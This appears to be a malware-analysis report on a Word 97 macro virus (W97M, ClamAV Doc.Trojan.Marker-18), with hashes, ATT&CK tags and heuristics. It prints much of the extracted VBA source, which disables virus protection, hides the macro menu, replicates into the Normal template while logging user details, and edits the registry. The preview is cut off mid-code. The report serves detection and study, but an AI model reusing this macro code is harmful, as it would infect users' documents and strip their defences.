W97M Office (OLE) malware analysis — malicious · 99e6b2880df1c573

MALICIOUS

Office (OLE)

46.5 KB Created: 2000-07-25 04:49:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: e49133be35c117ff0b753ba670e92523 SHA-1: cea4dafbc279d6a95e0cb5910e5fcfdcc7be1720 SHA-256: 99e6b2880df1c573c18087b2e0ef8451f4aca17b7ea5954ad59b40a7c97023ad

220 Risk Score

Malware Insights

W97M · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious OLE document containing a VBA macro that executes upon opening. The macro attempts to disable virus protection, modify application settings, and potentially spread itself by writing to the Normal template. The presence of 'W97M' in the document body and the macro's behavior strongly indicate a W97M family infection.

Heuristics 4

ClamAV: Doc.Trojan.Marker-18 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Marker-18
OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY

OLE file is 47,616 bytes but its declared streams total only 27,699 bytes — 19,917 bytes (42%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	25848 bytes
SHA-256: `81329d2e4dea05b54ce3a1c1dedc75ad0518a2a7e95bcc065e8ea958ef2fdfc7`
Detection ClamAV: Doc.Trojan.Marker-18 Obfuscation or payload: unlikely
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True 'Son, Be a Good Boy ! Const Marker = "<- this is a marker! by fs2000" Private Sub Document_Open() Document_Close End Sub Private Sub Document_Close() Dim nmod As Object Dim isd As String Dim DS, NTS, DI, NTI As Boolean Dim EmailMe, Users, LogData, LogFile As String On Error Resume Next CommandBars("Tools").Controls("Macro").Delete AddIns.Unload True Options.VirusProtection = False Application.UserName = "fs080298" Application.UserInitials = "FS2000" Application.UserAddress = "fs080298@yeayea.com" Application.EnableCancelKey = wdCancelDisabled GoSub Sisipin If (System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info", _ "LogData in") = False) Then GoSub LoggingIn GoSub EmailMePlease GoTo Finish Sisipin: Set AD = ActiveDocument.VBProject.VBComponents.Item(1) Set NT = NormalTemplate.VBProject.VBComponents.Item(1) DI = AD.CodeModule.Find(Marker, 1, 1, 10000, 10000) NTI = NT.CodeModule.Find(Marker, 1, 1, 10000, 10000) If (DI Xor NTI) And (ActiveDocument.SaveFormat = wdFormatDocument Or ActiveDocument.SaveFormat = wdFormatTemplate) Then If DI Then NTS = NormalTemplate.Saved EmailMe = AD.CodeModule.Lines(1, AD.CodeModule.CountOfLines) For i = 1 To Len(Application.UserAddress) If (Mid(Application.UserAddress, i, 1) <> Chr(13)) Then If (Mid(Application.UserAddress, i, 1) <> Chr(10)) Then Users = Users & Mid(Application.UserAddress, i, 1) End If Else Users = Users & Chr(13) & " '" End If Next EmailMe = EmailMe & Chr(13) & _ "' " & Format(Time, "hh:mm:sc AMPM-") & _ Format(Date, "dddd, d mmm yyyy") & Chr(13) & _ "' " & Application.UserName & Chr(13) & _ "' " & Users & Chr(13) & Chr(13) & " " NT.CodeModule.DeleteLines 1, NT.CodeModule.CountOfLines NT.CodeModule.AddFromString EmailMe If NTS Then NormalTemplate.Save End If If NTI Then DS = ActiveDocument.Saved EmailMe = NT.CodeModule.Lines(1, NT.CodeModule.CountOfLines) AD.CodeModule.DeleteLines 1, AD.CodeModule.CountOfLines AD.CodeModule.AddFromString EmailMe If DS Then ActiveDocument.Save End If End If Return LoggingIn: System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info", "LogData in") = True GoSub EmailMePlease Return EmailMePlease: Dim SystemRoot As String On Error Resume Next SystemRoot = System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion", "SystemRoot") System.PrivateProfileString("", "HKEY_CURRENT_USER\Control Panel\International", "s1159") = Chr$(60) + Chr$(40) + Chr$(164) + Chr$(191) + Chr$(164) + Chr$(41) + Chr$(62) System.PrivateProfileString("", "HKEY_CURRENT_USER\Control Panel\International", "sTimeFormat") = "HH:mm:ss tt" Open SystemRoot & "\EmailMe.html" For Output As #1 Print #1, "<html><head><title>Email Me !</title></head><body bgcolor='#000000' link='#FFFF00' vlink='#00FFFF'>" Print #1, "<p align='right'><font color='#80FF00' size='3' face='Arial'><marquee scrollamount='3' width='53%'> © Have a Nice Day ! - Don't Forget to Save Your Data...</marquee></font></p>" Print #1, "<h6 align='center'><font color=brown size='7'><marquee behavior='alternate' width='100%'>¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤</marquee></font>" Print #1, "<p align='center'><font color='#FF80FF' size='7'><marquee behavior='alternate' width='11%'>ÒÓ</marquee></f ... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.